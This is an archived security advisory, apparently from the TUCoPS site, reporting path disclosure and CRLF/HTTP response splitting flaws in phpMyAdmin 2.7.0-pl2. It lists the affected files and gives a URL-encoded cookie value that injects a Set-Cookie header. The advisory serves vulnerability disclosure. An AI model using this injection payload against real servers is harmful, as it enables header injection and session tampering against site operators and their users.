TUCoPS :: Web :: Adminware, Control Panels :: c07-1134.htm

PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting
PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting
PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting


*************************************************************************************
# Title   :  PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting Vulnerability
# Author  :   ajann
# Contact :   :(
# Tested  :  Just 2.7.0-pl2

*************************************************************************************


[[CRLF]]]------------------------------------------------------

Files----

/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..

/Files----

Cookie:

->Open Cookie Editor
->Find the phpMyAdmin value
->Write it ;

phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue

New Cookie => some=value

.....
..

[[/CRLF]]]

[[PATH]]]------------------------------------------------------

File----

//libraries/common.lib.php

/File----

[[/PATH]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH